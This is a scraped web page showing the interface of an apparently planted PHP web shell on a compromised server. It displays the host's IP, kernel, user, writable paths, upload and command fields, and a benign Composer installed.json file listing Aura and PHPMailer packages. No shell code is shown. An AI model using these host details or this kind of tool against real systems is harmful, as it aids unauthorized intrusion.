Warning: Trying to access array offset on null in /var/www/alexvillarreal/wp-content/mu-plugins/index.php on line 2

Deprecated: md5(): Passing null to parameter #1 ($string) of type string is deprecated in /var/www/alexvillarreal/wp-content/mu-plugins/index.php on line 2
403WebShell
403Webshell
Server IP : 74.208.250.37  /  Your IP : 216.73.216.233
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux ubuntu 6.8.0-124-generic #124-Ubuntu SMP PREEMPT_DYNAMIC Tue May 26 13:00:45 UTC 2026 x86_64
User : miferval ( 1000)
PHP Version : 8.3.6
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/uecaitta/vendor/composer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/uecaitta/vendor/composer/installed.json
[
    {
        "name": "aura/router",
        "version": "2.2.0",
        "version_normalized": "2.2.0.0",
        "source": {
            "type": "git",
            "url": "https://github.com/auraphp/Aura.Router.git",
            "reference": "2544c687a5074ca8ce0dbe6d27a04c006a118e2a"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/auraphp/Aura.Router/zipball/2544c687a5074ca8ce0dbe6d27a04c006a118e2a",
            "reference": "2544c687a5074ca8ce0dbe6d27a04c006a118e2a",
            "shasum": ""
        },
        "require": {
            "php": ">=5.3.0"
        },
        "time": "2014-11-10 15:51:58",
        "type": "library",
        "extra": {
            "aura": {
                "type": "library",
                "config": {
                    "common": "Aura\\Router\\_Config\\Common"
                }
            },
            "branch-alias": {
                "dev-develop-2": "2.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Aura\\Router\\": "src/",
                "Aura\\Router\\_Config\\": "config/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "BSD-2-Clause"
        ],
        "authors": [
            {
                "name": "Aura.Router Contributors",
                "homepage": "https://github.com/auraphp/Aura.Router/contributors"
            }
        ],
        "description": "A web router implementation; given a URI path and a copy of $_SERVER, it will extract path-info parameter values for a specific route.",
        "homepage": "https://github.com/auraphp/Aura.Router",
        "keywords": [
            "route",
            "router",
            "routing"
        ]
    },
    {
        "name": "aura/dispatcher",
        "version": "2.0.3",
        "version_normalized": "2.0.3.0",
        "source": {
            "type": "git",
            "url": "https://github.com/auraphp/Aura.Dispatcher.git",
            "reference": "cd28755a86f7a016a97022d2078e15e743c2a48d"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/auraphp/Aura.Dispatcher/zipball/cd28755a86f7a016a97022d2078e15e743c2a48d",
            "reference": "cd28755a86f7a016a97022d2078e15e743c2a48d",
            "shasum": ""
        },
        "require": {
            "php": ">=5.4.0"
        },
        "time": "2015-03-27 19:36:51",
        "type": "library",
        "extra": {
            "aura": {
                "type": "library"
            },
            "branch-alias": {
                "dev-develop-2": "2.0.x-dev"
            }
        },
        "installation-source": "dist",
        "autoload": {
            "psr-4": {
                "Aura\\Dispatcher\\": "src/"
            }
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "BSD-2-Clause"
        ],
        "authors": [
            {
                "name": "Aura.Dispatcher Contributors",
                "homepage": "https://github.com/auraphp/Aura.Dispatcher/contributors"
            }
        ],
        "description": "Creates objects from a factory and invokes methods using named parameters; also provides a trait for invoking closures and object methods with named parameters.",
        "homepage": "https://github.com/auraphp/Aura.Dispatcher",
        "keywords": [
            "controller",
            "dispatcher",
            "factory"
        ]
    },
    {
        "name": "phpmailer/phpmailer",
        "version": "v5.2.14",
        "version_normalized": "5.2.14.0",
        "source": {
            "type": "git",
            "url": "https://github.com/PHPMailer/PHPMailer.git",
            "reference": "e774bc9152de85547336e22b8926189e582ece95"
        },
        "dist": {
            "type": "zip",
            "url": "https://api.github.com/repos/PHPMailer/PHPMailer/zipball/e774bc9152de85547336e22b8926189e582ece95",
            "reference": "e774bc9152de85547336e22b8926189e582ece95",
            "shasum": ""
        },
        "require": {
            "php": ">=5.0.0"
        },
        "require-dev": {
            "phpdocumentor/phpdocumentor": "*",
            "phpunit/phpunit": "4.7.*"
        },
        "suggest": {
            "league/oauth2-client": "Needed for XOAUTH2 authentication",
            "league/oauth2-google": "Needed for Gmail XOAUTH2"
        },
        "time": "2015-11-01 10:15:28",
        "type": "library",
        "installation-source": "dist",
        "autoload": {
            "classmap": [
                "class.phpmailer.php",
                "class.phpmaileroauth.php",
                "class.phpmaileroauthgoogle.php",
                "class.smtp.php",
                "class.pop3.php",
                "extras/EasyPeasyICS.php",
                "extras/ntlm_sasl_client.php"
            ]
        },
        "notification-url": "https://packagist.org/downloads/",
        "license": [
            "LGPL-2.1"
        ],
        "authors": [
            {
                "name": "Jim Jagielski",
                "email": "jimjag@gmail.com"
            },
            {
                "name": "Marcus Bointon",
                "email": "phpmailer@synchromedia.co.uk"
            },
            {
                "name": "Andy Prevost",
                "email": "codeworxtech@users.sourceforge.net"
            },
            {
                "name": "Brent R. Matzelle"
            }
        ],
        "description": "PHPMailer is a full-featured email creation and transfer class for PHP"
    }
]

Youez - 2016 - github.com/yon3zu
LinuXploit